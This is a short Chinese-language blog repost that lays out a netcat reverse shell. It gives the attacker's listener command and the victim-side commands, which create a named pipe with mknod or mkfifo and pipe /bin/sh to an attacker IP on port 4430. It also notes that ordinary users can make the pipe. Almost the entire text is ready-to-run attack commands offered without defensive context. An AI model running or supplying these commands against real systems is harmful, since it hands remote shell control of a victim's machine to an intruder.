更新时间:2022-09-28 08:18:22
【转自】http://www.2cto.com/article/201305/209914.html
攻击方执行:
1
|
nc -lnvp 4430 |
被攻击方执行:
1
2
|
mknod /tmp/backpipe p
/bin/sh 0< /tmp/backpipe | nc 192.168.xx.xx 4430 1> /tmp/backpipe
|
网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。
本文转自fatshi51CTO博客,原文链接: http://blog.51cto.com/duallay/1887544,如需转载请自行联系原作者